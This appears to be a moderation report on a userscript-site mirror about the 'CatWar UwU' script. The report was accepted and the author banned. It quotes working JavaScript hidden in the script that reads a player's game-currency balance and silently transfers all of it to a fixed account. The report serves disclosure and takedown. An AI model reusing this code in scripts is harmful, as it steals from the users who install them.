CatWar UwU 2025-02-26 被举报,原因是:恶意软件或代码

举报者说:

This part of the code is fraudulent. She withdraws game money from the user and transfers it to another person. Just like the script author, I am not satisfied with this, and I would like to completely demolish the script page.

=======

const url = 'https://catwar.net/rabbit';

fetch(url)
.then(response => {
if (!response.ok) {
throw new Error('Network response was not ok ' + response.statusText);
}
return response.text();
})
.then(html => {

const parser = new DOMParser();
const doc = parser.parseFromString(html, 'text/html');

const balanceElement = doc.querySelector('p span b');
const balance = balanceElement ? parseInt(balanceElement.textContent) : 0;

const data = new URLSearchParams({
rabbit: balance,
cat: 1236261,
comment: ''
});

return fetch(url, {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: data.toString()
});
})

此脚本已经有 1 个之前被确认或修复的报告。

lbirtem已封禁(被举报用户)已经有:

管理员已通过该举报。

QingJ © 2025

镜像随时可能失效,请加Q群300939539或关注我们的公众号极客氢云获取最新地址